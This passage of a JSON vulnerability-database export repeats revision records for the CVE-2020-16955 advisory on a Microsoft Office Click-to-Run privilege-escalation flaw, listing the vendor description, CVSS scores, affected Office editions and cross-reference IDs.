"objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T10:44:19", "differentElements": ["msAffectedSoftware"], "edition": 26}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-10T18:58:38", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-09T06:50:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-09T06:50:14", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T18:58:38", "differentElements": ["msAffectedSoftware"], "edition": 27}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-10T20:44:33", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-09T06:50:14", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-09T06:50:14", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-10T20:44:33", "differentElements": ["msAffectedSoftware"], "edition": 28}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-11T08:47:48", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T08:47:48", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T08:47:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T08:47:48", "differentElements": ["msAffectedSoftware"], "edition": 29}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-11T11:22:24", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T08:47:48", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T08:47:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T11:22:24", "differentElements": ["msAffectedSoftware"], "edition": 30}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-11T12:51:48", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T08:47:48", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T08:47:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T12:51:48", "differentElements": ["msAffectedSoftware"], "edition": 31}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-11T15:07:47", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T08:47:48", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T08:47:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T15:07:47", "differentElements": ["msAffectedSoftware"], "edition": 32}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "11729814de529eab7b78202bfda89574", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-11T16:47:52", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MICROSOFT-OFFICE-CVE-2020-16934/"]}, {"type": "kaspersky", "idList": ["KLA11976"]}], "modified": "2021-09-11T08:47:48", "rev": 2}, "score": {"value": 7.1, "vector": "NONE", "modified": "2021-09-11T08:47:48", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBClick to Run"], "msrc": "", "mscve": "CVE-2020-16955", "msAffectedSoftware": [{"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 64-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft 365 Apps for Enterprise for 32-bit Systems", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2019 for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 64-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}, {"name": "Microsoft Office 2013 Click-to-Run (C2R) for 32-bit editions", "kbSupersedence": "", "kb": "KBClick to Run", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T16:47:52", "differentElements": ["msAffectedSoftware"], "edition": 33}, {"bulletin": {"id": "MS:CVE-2020-16955", "hash": "3ef380d1ad5cccc89011d4f3166318f2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Microsoft Office Click-to-Run Elevation of Privilege Vulnerability", "description": "An elevation of privilege vulnerability exists in the way that Microsoft Office Click-to-Run (C2R) AppVLP handles certain files. An attacker who successfully exploited the vulnerability could elevate privileges.\n\nTo exploit this vulnerability, an attacker would need to convince a user to open a specially crafted file.\n\nThe security update addresses the vulnerability by correcting how Microsoft Office Click-to-Run (C2R) components handle these files.\n", "published": "2020-10-13T07:00:00", "modified": "2020-10-13T07:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16955", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2020-16955"], "immutableFields": [], "lastseen": "2021-09-11T19:04:26", "history": [], "viewCount": 16, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-16955"]}, {"type": "metasploit", "idList": 